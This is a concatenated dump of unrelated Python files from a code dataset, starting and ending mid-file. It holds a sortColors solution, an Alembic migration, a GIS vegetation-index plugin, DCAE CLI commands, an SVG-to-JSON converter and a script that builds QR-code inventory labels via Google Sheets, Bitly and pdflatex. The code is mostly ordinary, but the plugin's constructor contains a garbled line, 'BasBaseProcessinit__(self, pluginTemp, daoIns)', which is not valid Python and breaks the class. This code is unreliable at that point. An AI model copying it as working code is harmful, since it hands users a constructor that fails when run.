main()\n\n","sub_path":"typhon/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":3678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"110530806","text":"#Time :O(n)\nclass Solution(object):\n def sortColors(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: void Do not return anything, modify nums in-place instead.\n \"\"\"\n color = [0,1,2]\n start = 0\n for i in xrange(len(color)):\n #if the current color is the same with the target \n #loop terminate when start = last index, since j = start+1\n while start < len(nums)-1 and nums[start] == color[i]:\n start +=1\n\n #at this moment the nums[start] is not color[i]\n for j in xrange(start+1,len(nums)):\n if nums[j] == color[i]:\n nums[j], nums[start] = nums[start], nums[j]\n start +=1","sub_path":"sort_color.py","file_name":"sort_color.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"111323287","text":"\"\"\"empty message\n\nRevision ID: 2d12ebb61a42\nRevises: 11c2d2c0e508\nCreate Date: 2019-10-20 19:48:06.378993\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '2d12ebb61a42'\ndown_revision = '11c2d2c0e508'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('participants', sa.Column('first_name', sa.String(length=20), nullable=True))\n op.add_column('participants', sa.Column('is_active', sa.Boolean(), nullable=True))\n op.add_column('participants', sa.Column('last_name', sa.String(length=30), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('participants', 'last_name')\n op.drop_column('participants', 'is_active')\n op.drop_column('participants', 'first_name')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/2d12ebb61a42_.py","file_name":"2d12ebb61a42_.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"252824236","text":"# -- coding: utf-8 --\r\n\r\nimport os\r\nfrom common.process import ProcessBase\r\nfrom utils.ArcPyUtil import ArcPyUtil\r\nfrom utils.StringFormat import StringFormat\r\nfrom utils.FileUtil import BaseFile \r\n\r\n\r\nclass Vege_NDVI_Comp_FY3AMERSI(ProcessBase):\r\n '''\r\n 植被检测 FY3AMERSI\r\n ''' \r\n \r\n def __init__(self, pluginTemp, daoIns): \r\n BasBaseProcessinit__(self, pluginTemp, daoIns)\r\n \r\n \r\n def setIDLOutName(self, pluginTemp):\r\n # 传入参数为 算法-任务编号-时间(yyyyMMdd) 每个月的文件 输出月0000/上旬0001/中旬0002/下旬0003四个产品Tif文件 0000-0003标识由IDL自行添加 \r\n # 每个文件完整的输出名称:算法-任务编号-时间(yyyyMMddHHmm).tif\r\n # 第一个参数表示当前月份信息 yyyyMM \r\n timeStr = pluginTemp.getParamByIndex(0)\r\n if timeStr == None:\r\n return None\r\n timeStr = timeStr + \"01\"\r\n timeStruct = StringFormat.isValidDateStr(timeStr, \"%Y%m%d\")\r\n if timeStruct == None:\r\n return None \r\n return pluginTemp.getPluginName() + \"-\" + pluginTemp.getProdID() + \"-\" + timeStr\r\n \r\n\r\n def checkIDLResult(self, pluginTemp):\r\n try:\r\n self.idlOutMap = {}\r\n idlOutDir = pluginTemp.getDirOut() \r\n idlOutName = pluginTemp.getIDLOutName()\r\n \r\n monthAllPath = os.path.join(idlOutDir, idlOutName + \"0000.tif\")\r\n monthFirstPath = os.path.join(idlOutDir, idlOutName + \"0001.tif\")\r\n monthMedPath = os.path.join(idlOutDir, idlOutName + \"0002.tif\")\r\n monthLastPath = os.path.join(idlOutDir, idlOutName + \"0003.tif\")\r\n \r\n if BaseFile.isFileOrDir(monthAllPath) == BaseFile.ISFILE:\r\n self.idlOutMap[\"MonthAll\"] = monthAllPath\r\n if BaseFile.isFileOrDir(monthFirstPath) == BaseFile.ISFILE:\r\n self.idlOutMap[\"MonthFirst\"] = monthFirstPath\r\n if BaseFile.isFileOrDir(monthMedPath) == BaseFile.ISFILE:\r\n self.idlOutMap[\"MonthMed\"] = monthMedPath\r\n if BaseFile.isFileOrDir(monthLastPath) == BaseFile.ISFILE:\r\n self.idlOutMap[\"MonthLast\"] = monthLastPath\r\n \r\n if \"MonthAll\" in self.idlOutMap.keys():\r\n pluginTemp.setIDLOutPath(idlOutDir, idlOutName + \"0000.tif\")\r\n return True\r\n else:\r\n return False\r\n except:\r\n return False\r\n \r\n \r\n def checkValueAry(self, pluginTemp):\r\n valueAry = pluginTemp.getValueAry() \r\n if len(valueAry) != 5:\r\n return False\r\n else:\r\n return True\r\n \r\n \r\n def getSubProdID(self, idlPath, pluginTemp):\r\n fileAry = BaseFile.getFilePathInfo(idlPath, True)\r\n if fileAry == None:\r\n return \"\"\r\n fileNameNoEx = fileAry[1]\r\n strAry = StringFormat.getStrSplitArray(fileNameNoEx, \"-\")\r\n if len(strAry) != 3:\r\n return \"\"\r\n timeStr = strAry[2]\r\n timeStruct = StringFormat.isValidDateStr(timeStr, \"%Y%m%d%H%M\")\r\n if timeStruct == None:\r\n return \"\"\r\n # 月及上中下旬的产品存在相应年的文件夹下\r\n subProdID = timeStr\r\n dirOut = os.path.join(pluginTemp.getDirOut(), subProdID)\r\n BaseFile.creatDir(dirOut) \r\n return subProdID\r\n \r\n \r\n def areaStatAndClip(self, tempDir, idlPath, isProvince, subProID, pluginTemp):\r\n areaIDCur = pluginTemp.getAreaID() \r\n prodName = pluginTemp.getProdName()\r\n pluginName = pluginTemp.getPluginName()\r\n prodID = pluginTemp.getProdID()\r\n dirOut = os.path.join(pluginTemp.getDirOut(), subProID)\r\n valueAry = pluginTemp.getValueAry() \r\n dirDepend = pluginTemp.getDirDepend()\r\n countyShp = pluginTemp.getDependFile(\"AreaCounty.shp\") \r\n cityShp = pluginTemp.getDependFile(\"AreaCity.shp\") \r\n provinceShp = pluginTemp.getDependFile(\"AreaProvince.shp\")\r\n rootAreaInfo = pluginTemp.getRootAreaInfo() \r\n \r\n # 经纬度投影转换为等面积投影\r\n idlAlbersPath = ArcPyUtil.changeToAlbersProj(idlPath, tempDir)\r\n if idlAlbersPath == None:\r\n return False\r\n \r\n index = 0 \r\n dataMap = {}\r\n for valueStr in valueAry:\r\n dataLists = ArcPyUtil.areaStatAreaDAO(tempDir, idlAlbersPath, countyShp, cityShp, provinceShp, valueStr, areaIDCur, isProvince, rootAreaInfo)\r\n if dataLists != None: \r\n for key in dataLists.keys():\r\n areaStr = dataLists[key]\r\n if not key in dataMap.keys():\r\n dataMap[key] = {}\r\n areaInfo = dataMap[key]\r\n levelType = \"Level\" + str(index + 1)\r\n areaInfo[levelType] = areaStr\r\n index += 1 \r\n \r\n for areaID in dataMap.keys():\r\n areaInfo = dataMap[areaID]\r\n lev1Area = \"0\"\r\n lev2Area = \"0\"\r\n lev3Area = \"0\"\r\n lev4Area = \"0\"\r\n lev5Area = \"0\"\r\n if \"Level1\" in areaInfo.keys():\r\n lev1Area = areaInfo[\"Level1\"]\r\n if \"Level2\" in areaInfo.keys():\r\n lev2Area = areaInfo[\"Level2\"]\r\n if \"Level3\" in areaInfo.keys():\r\n lev3Area = areaInfo[\"Level3\"] \r\n if \"Level4\" in areaInfo.keys():\r\n lev4Area = areaInfo[\"Level4\"] \r\n if \"Level5\" in areaInfo.keys():\r\n lev5Area = areaInfo[\"Level5\"] \r\n self.daoIns.insertProdInfo(prodName, pluginName, prodID, areaID, [lev1Area, lev2Area, lev3Area, lev4Area, lev5Area], subProID)\r\n self.doClipSrcTif(idlPath, dirDepend, areaID, tempDir, dirOut)\r\n \r\n # 生成专题图\r\n ArcPyUtil.creatJPG(dirDepend, dirOut, idlPath, prodName, areaIDCur, isProvince, prodID, dataMap.keys())\r\n \r\n return True\r\n \r\n","sub_path":"src/appGuangXi/pluginGX/Vege_NDVI_Comp_FY3AMERSI.py","file_name":"Vege_NDVI_Comp_FY3AMERSI.py","file_ext":"py","file_size_in_byte":6142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"369621131","text":"# ============LICENSE_START=======================================================\n# org.onap.dcae\n# ================================================================================\n# Copyright (c) 2017-2018 AT&T Intellectual Property. All rights reserved.\n# ================================================================================\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ============LICENSE_END=========================================================\n#\n# ECOMP is a trademark and service mark of AT&T Intellectual Property.\n\n# -*- coding: utf-8 -*-\n\"\"\"\nProvides component commands\n\"\"\"\nimport json\nfrom pprint import pformat\n\nimport click\nimport os\n\nfrom discovery_client import resolve_name\n\nfrom dcae_cli.util import profiles, load_json, dmaap, inputs, policy\nfrom dcae_cli.util.run import run_component, dev_component\nfrom dcae_cli.util import discovery as dis\nfrom dcae_cli.util import docker_util as du\nfrom dcae_cli.util.discovery import DiscoveryNoDownstreamComponentError\nfrom dcae_cli.util.undeploy import undeploy_component\nfrom dcae_cli.util.exc import DcaeException\n\nfrom dcae_cli.commands import util\nfrom dcae_cli.commands.util import parse_input, parse_input_pair, create_table\n\nfrom dcae_cli.catalog.exc import MissingEntry\n\n\n@click.group()\ndef component():\n pass\n\n\n@component.command(name='list')\n@click.option('--latest', is_flag=True, default=True, help='Only list the latest version of components which match the filter criteria')\n@click.option('--subscribes', '-sub', multiple=True, help='Only list components which subscribe to FORMAT')\n@click.option('--publishes', '-pub', multiple=True, help='Only list components which publish FORMAT')\n@click.option('--provides', '-pro', multiple=True, type=(str, str), help='Only list components which provide services REQ_FORMAT RESP_FORMAT')\n@click.option('--calls', '-cal', multiple=True, type=(str, str), help='Only list components which call services REQ_FORMAT RESP_FORMAT')\n@click.option('--deployed', is_flag=True, default=False, help='Display the deployed view. Shows details of deployed instances.')\n@click.pass_obj\ndef list_component(obj, latest, subscribes, publishes, provides, calls, deployed):\n '''Lists components in the public catalog. Uses flags to filter results.'''\n subs = list(map(parse_input, subscribes)) if subscribes else None\n pubs = list(map(parse_input, publishes)) if publishes else None\n provs = list(map(parse_input_pair, provides)) if provides else None\n cals = list(map(parse_input_pair, calls)) if calls else None\n\n user, catalog = obj['config']['user'], obj['catalog']\n # TODO: How about components that you don't own but you have deployed?\n comps = catalog.list_components(subs, pubs, provs, cals, latest, user=user)\n\n active_profile = profiles.get_profile()\n consul_host = active_profile.consul_host\n\n click.echo(\"Active profile: {0}\".format(profiles.get_active_name()))\n click.echo(\"\")\n\n def format_resolve_results(results):\n \"\"\"Format the results from the resolve_name function call\"\"\"\n if results:\n # Most likely the results will always be length one until we migrate\n # to a different way of registering names\n return \"\\n\".join([ pformat(result) for result in results ])\n else:\n return None\n\n def get_instances_as_rows(comp):\n \"\"\"Get all deployed running instances of a component plus details about\n those instances and return as a list of rows\"\"\"\n cname = comp[\"name\"]\n cver = comp[\"version\"]\n ctype = comp[\"component_type\"]\n\n instances = dis.get_healthy_instances(user, cname, cver)\n instances_status = [\"Healthy\"]*len(instances)\n instances_conns = [ format_resolve_results(resolve_name(consul_host, instance)) \\\n for instance in instances ]\n\n instances_defective = dis.get_defective_instances(user, cname, cver)\n instances_status += [\"Defective\"]*len(instances_defective)\n instances_conns += [\"\"]*len(instances_defective)\n\n instances += instances_defective\n\n return list(zip(instances, instances_status, instances_conns))\n\n # Generate grouped rows where a grouped row is (name, version, type, [instances])\n grouped_rows = [ (comp, get_instances_as_rows(comp)) for comp in comps ]\n\n # Display\n if deployed:\n def display_deployed(comp, instances):\n cname = comp[\"name\"]\n cver = comp[\"version\"]\n ctype = comp[\"component_type\"]\n\n click.echo(\"Name: {0}\".format(cname))\n click.echo(\"Version: {0}\".format(cver))\n click.echo(\"Type: {0}\".format(ctype))\n click.echo(create_table(('Instance', 'Status', 'Connection'), instances))\n click.echo(\"\")\n\n [ display_deployed(*row) for row in grouped_rows ]\n else:\n def format_row(comp, instances):\n return comp[\"name\"], comp[\"version\"], comp[\"component_type\"], \\\n util.format_description(comp[\"description\"]), \\\n util.get_status_string(comp), comp[\"modified\"], len(instances)\n\n rows = [ format_row(*grouped_row) for grouped_row in grouped_rows ]\n click.echo(create_table(('Name', 'Version', 'Type', 'Description',\n 'Status', 'Modified', '#Deployed'), rows))\n click.echo(\"\\nUse the \\\"--deployed\\\" option to see more details on deployments\")\n\n\n@component.command()\n@click.argument('component', metavar=\"name:version\")\n@click.pass_obj\ndef show(obj, component):\n '''Provides more information about a COMPONENT'''\n cname, cver = parse_input(component)\n catalog = obj['catalog']\n comp_spec = catalog.get_component_spec(cname, cver)\n\n click.echo(util.format_json(comp_spec))\n\n\n_help_dmaap_file = \"\"\"\nPath to a file that contains a json of dmaap client information. The structure of the json is expected to be:\n\n {\n : {..client object 1..},\n : {..client object 2..},\n ...\n }\n\nWhere \"client object\" can be for message or data router. The \"config_key\" matches the value of specified in the message router \"streams\" in the component specification.\n\nPlease refer to the documentation for examples of \"client object\".\n\"\"\"\n\ndef _parse_dmaap_file(dmaap_file):\n try:\n with open(dmaap_file, 'r+') as f:\n dmaap_map = json.load(f)\n dmaap.validate_dmaap_map_schema(dmaap_map)\n return dmaap.apply_defaults_dmaap_map(dmaap_map)\n except Exception as e:\n message = \"Problems with parsing the dmaap file. Check to make sure that it is a valid json and is in the expected format.\"\n raise DcaeException(message)\n\n\n_help_inputs_file = \"\"\"\nPath to a file that contains a json that contains values to be used to bind to configuration parameters that have been marked as \"sourced_at_deployment\". The structure of the json is expected to be:\n\n {\n : value,\n : value\n }\n\nThe \"parameter name\" is the value of the \"name\" property for the given configuration parameter.\n\"\"\"\n\ndef _parse_inputs_file(inputs_file):\n try:\n with open(inputs_file, 'r+') as f:\n inputs_map = json.load(f)\n # TODO: Validation of schema in the future?\n return inputs_map\n except Exception as e:\n message = \"Problems with parsing the inputs file. Check to make sure that it is a valid json and is in the expected format.\"\n raise DcaeException(message)\n\n\n_help_policy_file = \"\"\"\nPath to a file that contains a json of an (update/remove) Policy change.\nAll \"policies\" can also be specified.\nThe structure of the json is expected to be:\n\n{\n\"updated_policies\": [{\"policyName\": \"value\", \"\": \"\"},{\"policyName\": \"value\", \"\": \"\"}],\n\"removed_policies\": [{\"policyName\": \"value\", \"\": \"\"},{\"policyName\": \"value\", \"\": \"\"}],\n\"policies\": [{\"policyName\": \"value\", \"\": \"\"},{\"policyName\": \"value\", \"\": \"\"}]\n}\n\"\"\"\n\ndef _parse_policy_file(policy_file):\n try:\n with open(policy_file, 'r+') as f:\n policy_change_file = json.load(f)\n policy.validate_against_policy_schema(policy_change_file)\n return policy_change_file\n except Exception as e:\n click.echo(format(e))\n message = \"Problems with parsing the Policy file. Check to make sure that it is a valid json and is in the expected format.\"\n raise DcaeException(message)\n\n@component.command()\n@click.option('--external-ip', '-ip', default=None, help='The external IP address of the Docker host. Only used for Docker components.')\n@click.option('--additional-user', default=None, help='Additional user to grab instances from.')\n@click.option('--attached', is_flag=True, help='(Docker) dcae-cli deploys then attaches to the component when set')\n@click.option('--force', is_flag=True, help='Force component to run without valid downstream dependencies')\n@click.option('--dmaap-file', type=click.Path(resolve_path=True, exists=True, dir_okay=False),\n help=_help_dmaap_file)\n@click.option('--inputs-file', type=click.Path(resolve_path=True, exists=True, dir_okay=False),\n help=_help_inputs_file)\n@click.argument('component')\n@click.pass_obj\ndef run(obj, external_ip, additional_user, attached, force, dmaap_file, component,\n inputs_file):\n '''Runs latest (or specific) COMPONENT version. You may optionally specify version via COMPONENT:VERSION'''\n\n click.echo(\"Running the Component.....\")\n click.echo(\"\")\n\n cname, cver = parse_input(component)\n user, catalog = obj['config']['user'], obj['catalog']\n\n dmaap_map = _parse_dmaap_file(dmaap_file) if dmaap_file else {}\n inputs_map = _parse_inputs_file(inputs_file) if inputs_file else {}\n\n try:\n run_component(user, cname, cver, catalog, additional_user, attached, force,\n dmaap_map, inputs_map, external_ip)\n except DiscoveryNoDownstreamComponentError as e:\n message = \"Either run a compatible downstream component first or run with the --force flag to ignore this error\"\n raise DcaeException(message)\n except inputs.InputsValidationError as e:\n click.echo(\"ERROR: There is a problem. {0}\".format(e))\n click.echo(\"\")\n message = \"Component requires inputs. Please look at the use of --inputs-file and make sure the format is correct\"\n raise DcaeException(message)\n\n@component.command()\n@click.argument('component')\n@click.pass_obj\ndef undeploy(obj, component):\n '''Undeploy latest (or specific) COMPONENT version. You may optionally specify version via COMPONENT:VERSION'''\n cname, cver = parse_input(component)\n user, catalog = obj['config']['user'], obj['catalog']\n undeploy_component(user, cname, cver, catalog)\n\n\n@component.command()\n@click.argument('specification', type=click.Path(resolve_path=True, exists=True))\n@click.option('--additional-user', default=None, help='Additional user to grab instances from.')\n@click.option('--force', is_flag=True, help='Force component to run without valid downstream dependencies')\n@click.option('--dmaap-file', type=click.Path(resolve_path=True, exists=True, dir_okay=False),\n help=_help_dmaap_file)\n@click.option('--inputs-file', type=click.Path(resolve_path=True, exists=True, dir_okay=False),\n help=_help_inputs_file)\n@click.pass_obj\ndef dev(obj, specification, additional_user, force, dmaap_file, inputs_file):\n '''Set up component in development for discovery, use for local development'''\n user, catalog = obj['config']['user'], obj['catalog']\n\n dmaap_map = _parse_dmaap_file(dmaap_file) if dmaap_file else {}\n inputs_map = _parse_inputs_file(inputs_file) if inputs_file else {}\n\n with open(specification, 'r+') as f:\n spec = json.loads(f.read())\n try:\n dev_component(user, catalog, spec, additional_user, force, dmaap_map,\n inputs_map)\n except DiscoveryNoDownstreamComponentError as e:\n message = \"Either run a compatible downstream component first or run with the --force flag to ignore this error\"\n raise DcaeException(message)\n except inputs.InputsValidationError as e:\n click.echo(\"ERROR: There is a problem. {0}\".format(e))\n click.echo(\"\")\n message = \"Component requires inputs. Please look at the use of --inputs-file and make sure the format is correct\"\n raise DcaeException(message)\n\n\n@component.command()\n@click.argument('component')\n@click.pass_obj\ndef publish(obj, component):\n \"\"\"Pushes a COMPONENT to the public catalog\"\"\"\n name, version = parse_input(component)\n user, catalog = obj['config']['user'], obj['catalog']\n\n try:\n # Dependent data formats must be published first before publishing\n # component. Check that here\n unpub_formats = catalog.get_unpublished_formats(name, version)\n\n if unpub_formats:\n click.echo(\"ERROR: You must publish dependent data formats first:\")\n click.echo(\"\")\n click.echo(\"\\n\".join([\":\".join(uf) for uf in unpub_formats]))\n click.echo(\"\")\n return\n except MissingEntry as e:\n raise DcaeException(\"Component not found\")\n\n if catalog.publish_component(user, name, version):\n click.echo(\"Component has been published\")\n else:\n click.echo(\"ERROR: Component could not be published\")\n\n\n@component.command()\n@click.option('--update', is_flag=True, help='Updates a locally added component if it has not already been published')\n@click.argument('specification', type=click.Path(resolve_path=True, exists=True))\n@click.pass_obj\ndef add(obj, update, specification):\n \"\"\"Add Component to local onboarding catalog\"\"\"\n user, catalog = obj['config']['user'], obj['catalog']\n\n spec = load_json(specification)\n catalog.add_component(user, spec, update)\n\n\n@component.command()\n@click.option('--policy-file', type=click.Path(resolve_path=True, exists=True, dir_okay=False), help=_help_policy_file)\n@click.argument('component')\n@click.pass_obj\ndef reconfig(obj, policy_file, component):\n \"\"\"Reconfigure COMPONENT for Policy change.\n Modify Consul KV pairs for ('updated_policies', 'removed_policies', and 'policies') for Policy change event,\n Execute the reconfig script(s) in the Docker container\"\"\"\n\n click.echo(\"Running Component Reconfiguration.....\")\n click.echo(\"\")\n\n # Read and Validate the policy-file\n policy_change_file = _parse_policy_file(policy_file) if policy_file else {}\n\n if not (policy_change_file):\n click.echo(\"ERROR: For component 'reconfig', you must specify a --policy-file\")\n click.echo(\"\")\n return\n else:\n # The Component Spec contains the Policy 'Reconfig Script Path/ScriptName'\n cname, cver = parse_input(component)\n catalog = obj['catalog']\n comp_spec = catalog.get_component_spec(cname, cver)\n\n # Check if component is running and healthy\n active_profile = profiles.get_profile()\n consul_host = active_profile.consul_host\n service_name = os.environ[\"SERVICE_NAME\"]\n if dis.is_healthy(consul_host, service_name):\n pass\n else:\n click.echo(\"ERROR: The component must be running and healthy. It is not.\")\n click.echo(\"\")\n return\n\n try:\n policy_reconfig_path = comp_spec['auxilary']['policy']['script_path']\n except KeyError:\n click.echo(\"ERROR: Policy Reconfig Path (auxilary/policy/script_path) is not specified in the Component Spec\")\n click.echo(\"\")\n return\n\n kvUpdated = dis.policy_update(policy_change_file, dis.default_consul_host())\n\n if kvUpdated:\n active_profile = profiles.get_profile()\n docker_logins = dis.get_docker_logins()\n\n command = dis.build_policy_command(policy_reconfig_path, policy_change_file, dis.default_consul_host())\n\n # Run the Policy Reconfig script\n client = du.get_docker_client(active_profile, docker_logins)\n du.reconfigure(client, service_name, command)\n else:\n click.echo(\"ERROR: There was a problem updating the policies in Consul\")\n click.echo(\"\")\n return\n\n click.echo(\"\")\n click.echo(\"The End of Component Reconfiguration\")\n","sub_path":"dcae-cli/dcae_cli/commands/component/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":16690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"441925622","text":"import json\nimport lxml.etree as et\nimport click\nimport os\nimport shutil\nimport warnings\nfrom collections import OrderedDict\n\n\n@click.command()\n@click.argument('files', nargs=-1)\n@click.option('--kind')\ndef cmd_convert(files, kind):\n files = sorted(files)\n output = {}\n fail_dir = 'symbols_too_large'\n \n for file in files:\n if not os.path.exists(file):\n continue\n try:\n with open(file, 'rb') as fp:\n root = et.parse(fp)\n except:\n raise click.ClickException('Failed to read {0}'.format(file))\n \n if os.stat(file).st_size > 1536:\n click.echo('File too large for inclusion {0}'.format(file), err=True)\n fail_dir_extended = fail_dir+'/'+os.path.dirname(file)\n if not os.path.exists(fail_dir_extended):\n os.makedirs(fail_dir_extended)\n shutil.move(file, fail_dir+'/'+file)\n continue\n \n el = root.find('a:path', namespaces={'a':'http://www.w3.org/2000/svg'})\n path = el.attrib['d']\n nickname = os.path.splitext(os.path.basename(file))[0] \\\n .replace('_', '-').replace(' ', '-') \\\n .replace('_Copy', '').replace('svg', '') \\\n .replace('--', '-').lower()\n for i in range(0, 9):\n nickname = nickname.replace('({})'.format(i), '').strip('- ')\n key = '{0}-{1}'.format(kind, nickname)\n key = key\n output[key] = OrderedDict([\n ('name', nickname.replace('-', ' ').title()),\n ('tags', [kind]),\n ('category', kind.capitalize()),\n ('path', path),\n ('bbox', dict(x=0,y=0,x2=512,y2=512,width=512,height=512,cx=256,cy=256)),\n ('scale', 0.046875),\n ('strokeWidth', 6),\n ])\n click.echo(json.dumps(output, indent=True))\n\nif __name__ == '__main__':\n cmd_convert()\n","sub_path":"jackson/svg2json.py","file_name":"svg2json.py","file_ext":"py","file_size_in_byte":1836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"38017548","text":"# import pyqrcode and Bitly API for link shortening\nimport pyqrcode\nimport string\nimport bitly_api\n\n# imports for handling latex and pdflatex\nfrom os import listdir, unlink, remove, makedirs, rename\nfrom os.path import isfile, join, isdir\nfrom subprocess import Popen\nfrom shlex import split\n\n# Google API authentication and gspread imports\nimport json\nimport gspread\nfrom oauth2client.service_account import ServiceAccountCredentials\n\n# import configuration parsing tools\nimport ConfigParser, argparse\n\n# open config file\nparser = argparse.ArgumentParser()\nparser.add_argument(\"config\")\nargs = parser.parse_args()\ncfile = args.config\n\nconfig = ConfigParser.ConfigParser()\nconfig.read(cfile)\n\n# authenticate Google API and gspread\njson_filename = config.get('Google login', 'json_oauth2_filename')\njson_key = json.load(open(json_filename))\nscope = ['https://spreadsheets.google.com/feeds']\noauth2_credentials = ServiceAccountCredentials.from_json_keyfile_name(json_filename, scope)\ngc = gspread.authorize(oauth2_credentials)\nprint('Google API authenticated')\nprint('----------------------------------------------------')\n\n# authenticate Bitly API\nbitly_username = config.get('Bitly login', 'bitly_username')\nbitly_access_key = config.get('Bitly login', 'bitly_access_key')\nbitly = bitly_api.Connection(bitly_username, bitly_access_key)\nprint('Bitly API authenticated')\nprint('----------------------------------------------------')\n\n# open spreadsheet\ninventory = gc.open('LARICS Inventar')\nequipment_sheet = inventory.worksheet('Popis opreme')\nqr_codes_sheet = inventory.worksheet('QR codes')\nprint('Spreadsheets opened')\nprint('----------------------------------------------------')\n\n# get data and data length\nequipment_data = equipment_sheet.get_all_records()\nqr_codes_data = qr_codes_sheet.get_all_records()\ndata_length = min(len(qr_codes_data), len(equipment_data))\n\n# obtain QR code links, check if updated and already printed\nlinks = []\nfor i in range(data_length):\n\tif equipment_data[i]['Osvjezeno'].upper() == 'DA' and not equipment_data[i]['Isprintano'].upper() == 'DA' :\n\t\tlinks.append(qr_codes_data[i]['URL'])\n\n# make sure QRCodes directory exists\ntry: \n makedirs('./QRCodes/')\nexcept OSError:\n if not isdir('./QRCodes/'):\n raise\n# process and shorten links and generate QR code images\nlink_count = 0\nfor link in links:\n\tlink_split = link.split('=')\n\tname_from_sheet = link_split[1].split('&')[0]\n\tid_from_sheet = link_split[3].split('&')[0]\n\tname_from_sheet = string.replace(name_from_sheet, '+','_')\n\tname_from_sheet = string.replace(name_from_sheet, '/','-')\n\tname_from_sheet = string.replace(name_from_sheet, ',','')\n\tname_from_sheet = string.replace(name_from_sheet, '.','')\n\tif id_from_sheet == '' or name_from_sheet == '':\n\t\tlink_count = link_count + 1\n\t\tprint('Done '+str(link_count)+'/'+str(len(links))+'\\r')\n\t\tcontinue\n\tif len(id_from_sheet)==1:\n\t\tid_from_sheet = '00'+id_from_sheet\n\telif len(id_from_sheet)==2:\n\t\tid_from_sheet = '0'+id_from_sheet\n\tname = \"./QRCodes/\"+id_from_sheet+'_'+name_from_sheet+\".png\"\n\tcurrent_cell = qr_codes_sheet.find(link)\n\tshort_link_cell = qr_codes_sheet.cell(current_cell.row, current_cell.col+2)\n\tif short_link_cell.value:\n\t\tshort_url = short_link_cell.value\n\telse:\n\t\tshort_url = bitly.shorten(link)['url']\n\t\tqr_codes_sheet.update_cell(short_link_cell.row, short_link_cell.col, short_url)\n\turl = pyqrcode.create(short_url)\t\n\turl.png(name, scale=6)\n\tlink_count = link_count + 1\n\nprint('Done '+str(link_count)+'/'+str(len(links))+'\\r')\nprint('Links shortened')\nprint('----------------------------------------------------')\n\n# fetch QR code filenames and sort them\nonlyfiles = [f for f in listdir('QRCodes') if isfile(join('QRCodes',f))]\nonlyfiles.sort()\n\n# assign files to pages, n number of files per page\nn = 40\npages = []\nfor i in range(0, len(onlyfiles), n):\n\tchunk = onlyfiles[i:i+n]\n\tpages.append(chunk)\n\n# last page may not be full, check the length\nif len(pages)>1:\n\tprint(pages)\n\toverflow = len(pages[-1])\nelse:\n\tprint(pages)\n\toverflow = len(pages[0])\n\n\n# read template for a full page\nwith open (\"template_full.tex\", \"r\") as template_full_file:\n\ttemplate_full = template_full_file.read()\n\n# not full page template\nwith open (\"template_empty.tex\", \"r\") as template_empty_file:\n\ttemplate_empty = template_empty_file.read()\n\n# create empty dictionary\ndictionary = {}\nfor i in range(80):\n\tdictkey = 'entry'+str(i+1)\n\tdictvalue = ' '\n\tdictionary[dictkey] = dictvalue\n\n# fill dictionary with a proper amount of entries\nfor i in range(overflow):\n\tdictkey_odd = 'entry' + str(i*2+1)\n\tdictkey_even = 'entry' + str(i*2+2)\n\tdictvalue_odd = r'\\includegraphics[height=2.85 cm]{%(filename'+str(i+1)+')s}'\n\tdictvalue_even = '%(name' + str(i+1) +r')s INV\\_BR:%(ib'+str(i+1)+')s'\n\tdictionary[dictkey_odd] = dictvalue_odd\n\tdictionary[dictkey_even] = dictvalue_even\n\n# fill template for empty page\ntemplate_empty = template_empty%dictionary\n\n# process pages\npagecount = 0\nto_compile = []\nfor page in pages:\n\tdictionary = {}\n\tfilecount = 0\n\tfor filename in page:\n\t\tdictkey_filename = 'filename'+str(filecount+1)\n\t\tdictvalue_filename = 'QRCodes/'+str(filename)\n\t\tdictkey_ib = 'ib'+str(filecount+1)\n\t\tdictkey_name = 'name'+str(filecount+1)\n\t\tdictvalue_ib = filename.split('_')[0]\n\t\twhile dictvalue_ib[0]=='0':\n\t\t\tdictvalue_ib = dictvalue_ib[1:]\n\t\tdictionary[dictkey_filename] = dictvalue_filename\n\t\tdictionary[dictkey_ib] = dictvalue_ib\n\t\tname = filename.split('_')[1:]\n\t\tname[-1] = name[-1].split('.')[0]\n\t\tname_to_write = ''\n\t\tword_count = 0\n\t\tfor word in name:\n\t\t\tname_to_write = name_to_write + ' ' + word\n\t\t\tword_count = word_count + 1\n\t\tname_to_write.replace('\\xc5', 'z')\n\t\tname_to_write.replace('\\xc4', 'c')\n\t\tif len(name_to_write) > 35:\n\t\t\tname_to_write = name_to_write[0:34]\n\t\tdictionary[dictkey_name] = name_to_write\n\t\tfilecount = filecount + 1\n\tif len(page) == n:\n\t\tto_write = template_full%dictionary\n\telse:\n\t\tto_write = template_empty%dictionary\n\ttex_filename = 'page'+str(pagecount+1)+'.tex'\n\twith open (tex_filename, 'w') as writefile:\n\t\twritefile.write(to_write)\n\tto_compile.append(tex_filename)\n\tpagecount = pagecount + 1\n\n# compile tex files\nfor texfile in to_compile:\n\tcommand = 'pdflatex ' + texfile\n\tproc = Popen(split(command))\n\tproc.communicate()\n\n# cleanup\ntry: \n makedirs('./ToPrint/')\nexcept OSError:\n if not isdir('./ToPrint/'):\n raise\nnames = []\nfor texfile in to_compile:\n\t[name,ext] = 